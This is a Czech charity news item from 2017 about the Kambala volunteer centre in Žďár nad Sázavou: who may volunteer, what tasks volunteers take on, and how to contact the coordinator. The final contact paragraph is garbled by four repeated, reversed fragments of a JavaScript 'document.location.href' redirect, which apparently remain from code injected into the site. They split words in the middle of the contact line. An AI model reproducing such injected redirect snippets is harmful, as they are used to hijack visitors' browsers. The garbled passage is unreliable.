Rainbow page separator

Dobrovolnictví není nuda

Čtvrtek, 24. srpna 2017

Dobrovolnictví je dlouhodobým trendem v České republice i v zahraničí. V Oblastní charitě Žďár nad Sázavou funguje od roku 2004 dobrovolnické centrum Kambala, které zprostředkovává dobrovolnickou činnost v charitních službách i ve spolupracujících organizacích v rámci okresu Žďár nad Sázavou.

Stát se dobrovolníkem není omezené. Může jím být každý, kdo má chuť a čas smysluplně vyžívat své volné chvíle. Osoby starší patnácti let přicházejí přímo do dobrovolnického centra nebo do konkrétní služby, ve které by chtěly pomáhat. Pomáhají jak studenti, tak i maminky na mateřské dovolené či senioři.

Stát se dobrovolníkem je opravdu snadné. Není potřeba skládat žádné složité vstupní zkoušky nebo splnit odpovídající vzdělání. Opravdu stačí mít čas a chuť. Dobrovolníci mohou docházet přímo k uživatelům nebo pomáhat s administrativou, s tvorbou tabulek v počítači, s balením potravinové pomoci a přesunem lůžek. Také jednorázová pomoc je v Kambale vítána.

Dobrovolnictví není rozhodně nuda. Obohacuje nejen uživatele charitních služeb či spolupracujících organizací, kteří například tráví volné chvíle popovídáním si s dobrovolníkem, hrou karet nebo předčítáním knihy, ale i samotné dobrovolníky. Ti si mohou rozšířit své znalosti, učit se novým situacím, poznávat chod zařízení a také napomáhat ke zkvalitnění sociálních, humanitárních a prorodinných služeb.

Zájemci, kterým by pomoc druhým činila radost a kteří by měli o dobrovolnictví zájem, mohou kontak[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat koordiná[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torku dobrovolnického centra na mobilním čísle 777 755 444 či emailu dc@zdar.charita.cz